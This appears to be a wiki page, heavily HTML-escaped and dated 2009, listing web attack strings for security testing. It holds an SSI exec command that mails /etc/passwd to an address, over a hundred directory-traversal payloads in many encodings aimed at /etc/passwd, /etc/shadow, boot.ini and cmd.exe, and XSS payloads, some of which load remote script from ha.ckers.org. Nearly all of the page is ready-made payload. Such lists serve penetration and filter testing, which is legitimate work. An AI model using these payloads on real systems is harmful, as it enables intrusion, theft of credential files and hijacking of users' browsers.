&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
